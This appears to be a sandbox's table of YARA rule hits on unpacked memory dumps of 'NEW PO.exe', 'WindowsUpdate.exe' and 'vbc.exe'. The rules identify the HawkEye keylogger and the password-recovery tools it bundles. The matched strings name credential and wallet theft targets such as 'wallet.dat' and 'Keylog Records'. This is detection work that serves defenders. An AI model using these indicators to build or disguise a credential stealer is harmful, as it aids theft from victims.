18.0.WindowsUpdate.exe.408208.7.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.2.WindowsUpdate.exe.400000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.408208.7.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.400000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.408208.7.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.408208.7.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.408208.7.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.408208.7.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.400000.26.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.26.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.26.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.26.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.26.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.26.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.2afd174.31.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.NEW PO.exe.474fbd0.5.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79a59:$key: HawkEyeKeylogger 0x7bcd7:$salt: 099u787978786 0x7a0b6:$string1: HawkEye_Keylogger 0x7af09:$string1: HawkEye_Keylogger 0x7bc37:$string1: HawkEye_Keylogger 0x7a49f:$string2: holdermail.txt 0x7a4bf:$string2: holdermail.txt 0x7a3e1:$string3: wallet.dat 0x7a3f9:$string3: wallet.dat 0x7a40f:$string3: wallet.dat 0x7b7fb:$string4: Keylog Records 0x7bb13:$string4: Keylog Records 0x7bd2f:$string5: do not script --> 0x79a41:$string6: \pidloc.txt 0x79acf:$string7: BSPLIT 0x79adf:$string7: BSPLIT
0.2.NEW PO.exe.474fbd0.5.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.NEW PO.exe.474fbd0.5.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.NEW PO.exe.474fbd0.5.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.NEW PO.exe.474fbd0.5.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.NEW PO.exe.474fbd0.5.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a10e:$hawkstr1: HawkEye Keylogger 0x7af4f:$hawkstr1: HawkEye Keylogger 0x7b27e:$hawkstr1: HawkEye Keylogger 0x7b3d9:$hawkstr1: HawkEye Keylogger 0x7b53c:$hawkstr1: HawkEye Keylogger 0x7b7d3:$hawkstr1: HawkEye Keylogger 0x79c80:$hawkstr2: Dear HawkEye Customers! 0x7b2d1:$hawkstr2: Dear HawkEye Customers! 0x7b428:$hawkstr2: Dear HawkEye Customers! 0x7b58f:$hawkstr2: Dear HawkEye Customers! 0x79da1:$hawkstr3: HawkEye Logger Details:
10.0.vbc.exe.400000.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.45fa72.22.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
16.0.WindowsUpdate.exe.45fa72.22.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.45fa72.22.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.45fa72.22.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.45fa72.38.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.38.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.38.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.38.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
23.0.vbc.exe.400000.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.2.WindowsUpdate.exe.408208.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.2.WindowsUpdate.exe.408208.1.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.2.WindowsUpdate.exe.408208.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.2.WindowsUpdate.exe.408208.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.2.WindowsUpdate.exe.408208.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.408208.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.45fa72.40.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.40.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.40.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.45fa72.40.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.45fa72.24.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
22.0.vbc.exe.400000.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.409c0d.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.2.WindowsUpdate.exe.409c0d.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.409c0d.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.2.WindowsUpdate.exe.409c0d.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.409c0d.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.3aa9930.46.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.3aa9930.46.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.409c0d.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
16.2.WindowsUpdate.exe.409c0d.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.2.WindowsUpdate.exe.409c0d.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.2.WindowsUpdate.exe.409c0d.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.409c0d.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.3aa9930.46.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.19.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.29.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.29.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.29.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.29.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.409c0d.19.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.19.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.19.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.19.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.409c0d.7.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.0.vbc.exe.400000.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.3ac2370.47.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.45fa72.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
16.2.WindowsUpdate.exe.45fa72.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.2.WindowsUpdate.exe.45fa72.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.2.WindowsUpdate.exe.45fa72.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
18.2.WindowsUpdate.exe.42d9930.8.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
23.0.vbc.exe.400000.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.23.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.0.NEW PO.exe.409c0d.23.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.23.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.23.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.23.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.2d94168.32.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
23.0.vbc.exe.400000.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.35e4248.32.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.2.WindowsUpdate.exe.408208.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
18.2.WindowsUpdate.exe.408208.2.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.2.WindowsUpdate.exe.408208.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.408208.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.2.WindowsUpdate.exe.408208.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.408208.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
11.0.vbc.exe.400000.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
